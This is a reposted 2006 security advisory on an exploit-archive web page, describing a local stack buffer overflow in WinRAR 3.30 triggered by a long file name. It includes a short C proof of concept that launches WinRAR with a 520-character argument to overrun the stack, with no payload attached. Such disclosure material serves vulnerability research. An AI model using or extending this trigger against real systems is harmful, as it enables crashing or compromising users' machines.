首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WinRAR Buffer Overflow Vulnerability in File Name
来源:Alpha_Programmer@LinuxMail.ORG 作者:Alpha 发布时间:2006-01-04  

Hello everybody

We found a vulnerability in WinRAR 3.30 that overrun the program in Windows Platforms .

================================================
Synopsis: WinRAR Buffer Overflow Vulnerability in File Name
Product: WinRAR
Version: 3.30
Vender: RARLab (http://www.rarlab.com)
Remote: No
Local: Yes
Discover: Vredited By Alpha Programmer & Trap-Set U.H Team
================================================

When WinRAR Opens an archive which includes the long File Name in inside, Buffer Over runing occurs on the stack.
This Event Happen When We Use 520 Character inside the Winrar.exe. it Fill the Ret Successful .

================================================

In Follow You Can See a Proof Of Concept For Overflow . Please Execute it in Winrar 3.30 Directory :

================================================
#include<stdio.h>
#include<windows.h>

int main (void)
{
char bad[1500] = "" ;
char bad2[1500] = "WinRAR\t";


printf ("\t\t** Merry Christmas **\n\n");
printf ("\t\t Trap-Set U.H Team\n");
printf (" \tWinRAR 3.30 Local Buffer Overflow\n");
memset (bad,'a',520);

strcat(bad2,bad);
printf("\nOver Running ... Just a Proof Of Concept . Not For Attacking !\n\n");
printf("\tDiscovered By : Alpha Programmer\n");

system(bad2);

return (0);

}
================================================

Tested on WinXP SP 2 Platform .

Special Tnx to :

mh_p0rtal -- Dr-CephaleX

And : www.Couz.com Security Team

For Contact :

Alpha_Programmer@LinuxMail.ORG

** Trap-Set U.H Team **
** Merry Christmas **

=================================================




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Valdersoft Shopping Cart versi
·Windows XP/2003 Picture and Fa
·SCO Openserver 5.0.7 termsh lo
·The Lizard Cart CMS version 1.
·CuteNews <=1.4.1 remote com
·ShixxNote Buffer Overflow
·/usr/bin/mtink local root expl
·Sun Solaris printd Daemon Remo
·Mozilla Firefox InstallVersion
·MyBB finduser Search SQL Injec
·aMSN Messenger DoS
·Electronic Mail for UNIX (Elm)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved